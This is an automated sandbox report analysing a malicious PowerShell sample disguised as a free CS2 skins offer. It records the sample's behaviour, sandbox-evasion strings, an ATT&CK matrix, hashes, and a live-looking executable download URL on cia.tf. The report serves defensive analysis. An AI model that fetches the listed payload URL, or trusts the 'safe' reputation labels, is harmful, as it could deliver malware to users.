Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3905Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5946Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3416Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: Amcache.hve.0.drBinary or memory string: VMware
Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000000.00000002.2254642292.000001AD434F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.0.drBinary or memory string: vmci.sys
Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.drBinary or memory string: VMware20,1
Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping11
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
FreeCs2Skins.ps10%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://cia.tf0%Avira URL Cloudsafe
https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exeP0%Avira URL Cloudsafe
http://cia.tf0%Avira URL Cloudsafe
https://cia.tf/0%Avira URL Cloudsafe
https://bad.is-having.fun0%Avira URL Cloudsafe
https://coquettte.com0%Avira URL Cloudsafe
https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exe0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
cia.tf
172.67.129.178
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exefalse
    • Avira URL Cloud: safe
    unknown
    https://cia.tf/false
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2250481889.000001AD3B251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://cia.tfpowershell.exe, 00000000.00000002.2236342823.000001AD2C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6D5000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://go.micropowershell.exe, 00000000.00000002.2236342823.000001AD2BCD3000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://contoso.com/powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2250481889.000001AD3B251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://coquettte.compowershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://bad.is-having.funpowershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://cia.tffile.exe.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://upx.sf.netAmcache.hve.0.drfalse
                      high
                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.2236342823.000001AD2B0A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exePpowershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2236342823.000001AD2B0A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            172.67.129.178
                            cia.tfUnited States
                            13335CLOUDFLARENETUSfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1562380
                            Start date and time:2024-11-25 14:58:10 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 14s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:FreeCs2Skins.ps1
                            Detection:MAL
                            Classification:mal48.winPS1@3/7@1/1
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 3
                            • Number of non-executed functions: 4
                            Cookbook Comments:
                            • Found application associated with file extension: .ps1
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 3300 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • VT rate limit hit for: FreeCs2Skins.ps1
                            TimeTypeDescription
                            08:59:04API Interceptor45x Sleep call for process: powershell.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            172.67.129.178Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              cia.tfRef#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                              • 172.67.129.178
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSRef#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                              • 104.26.13.205
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 172.64.41.3
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.155.47
                              PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                              • 104.26.13.205
                              0Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                              • 172.64.41.3
                              DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 104.21.24.198
                              CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 104.26.12.205
                              New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              • 172.67.177.134
                              packing list G25469.exeGet hashmaliciousFormBookBrowse
                              • 104.21.49.253
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eRef#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                              • 172.67.129.178
                              PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                              • 172.67.129.178
                              CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 172.67.129.178
                              New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.129.178
                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              • 172.67.129.178
                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 172.67.129.178
                              WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 172.67.129.178
                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                              • 172.67.129.178
                              https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4Get hashmaliciousHTMLPhisherBrowse
                              • 172.67.129.178
                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                              • 172.67.129.178
                              No context
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1628158735648508
                              Encrypted:false
                              SSDEEP:3:NlllulLhwlz:NllUO
                              MD5:F442CD24937ABD508058EA44FD91378E
                              SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                              SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                              SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e................................................@..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text
                              Category:dropped
                              Size (bytes):2062
                              Entropy (8bit):4.8517315141878345
                              Encrypted:false
                              SSDEEP:48:WywDGnbZIwDG03wDMfmNSNRhV1CSIqanVuT:WDem81C0eI
                              MD5:A3705823E9CD79D4B3365416E48024A7
                              SHA1:9C659FA6C6A7B82B71D9096989B48C77F9E446FC
                              SHA-256:E7C4308F43373C5F00CA53151C4452C662057F20218109FC95B816B9CB202D1F
                              SHA-512:499B6FC581546E7E29DC589E9ACE1B79CB308B4774CA912A23D9A544FB3C5EACFCF18AF1042F24DD9F0B531B7C85D05DA858C3E12FBABB0EF3E3CB9329238280
                              Malicious:false
                              Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>cia.tf</title>. <meta name="theme-color" content="#000000" />. <meta name="description" content="just a fresh file uploader built for the modern ages ..">. <meta property="og:url" content="https://cia.tf">. <meta property="og:type" content="website">. <meta property="og:title" content="cia.tf">. <meta property="og:description" content="just a fresh file uploader built for the modern ages ..">. <meta property="twitter:domain" content="cia.tf">. <meta property="twitter:url" content="https://cia.tf">. <meta name="twitter:title" content="cia.tf">. <meta name="twitter:description" content="just a fresh file uploader built for the modern ages ..">. <link rel="icon" type="image/x-icon" href="/favicon.ico">. <link rel="stylesheet" href="/styles.css">. <link rel="preconnect" href="https://fonts.googl
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6224
                              Entropy (8bit):3.7074480723483307
                              Encrypted:false
                              SSDEEP:48:+kD9jlWotuaCQYa3CyMFU2U7Y6ukvhkvklCywbfCL/dlHJ2SogZoX/CL/dlw2SoR:Vbt33CqT2kvhkvCCtzCL/dbHYCL/dYHU
                              MD5:9380634DDEF09DC29164BBD7BD8B9902
                              SHA1:C00F7F0F4515F111A7094A1FF4EA275EDE6F4521
                              SHA-256:6CDEC3A6ADDD3FA794A3AEEED45EC53A12DD9A7C8165952DCF16E581CCA2249A
                              SHA-512:6CFF9FBCD662EE99F80C4C600A443C3ABA7BC971DBDF48A748C6A7238CB0671993356180F3942223CCFA04F2F5C354D7D38C5441629D37A2B7442A6D0DB300C9
                              Malicious:false
